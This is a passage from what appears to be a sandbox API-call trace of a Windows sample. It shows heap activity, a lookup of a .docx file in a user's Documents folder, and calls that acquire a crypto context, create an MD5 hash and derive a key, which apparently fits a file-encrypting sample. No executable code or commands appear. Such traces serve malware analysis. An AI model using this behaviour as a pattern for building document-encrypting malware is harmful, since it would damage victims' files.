lpString2=".", cchCount2=1) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.942] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.942] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.943] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.943] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bf33a0, ftCreationTime.dwHighDateTime=0x1d554dd, ftLastAccessTime.dwLowDateTime=0x87b8dd90, ftLastAccessTime.dwHighDateTime=0x1d57b4f, ftLastWriteTime.dwLowDateTime=0x87b8dd90, ftLastWriteTime.dwHighDateTime=0x1d57b4f, nFileSizeHigh=0x0, nFileSizeLow=0x1524d, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="CIgOY5U5b6Axtcb.docx", cAlternateFileName="CIGOY5~1.DOC")) returned 0x7c2240 [0032.943] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0032.943] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.943] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.943] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.944] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.944] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.944] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.944] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.945] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.946] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.946] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.946] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.946] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.946] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.946] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.947] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.947] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.947] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.947] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.947] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.947] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.947] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0032.947] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.947] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.948] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.948] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0032.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.948] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.948] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.948] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.948] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.948] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.948] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree 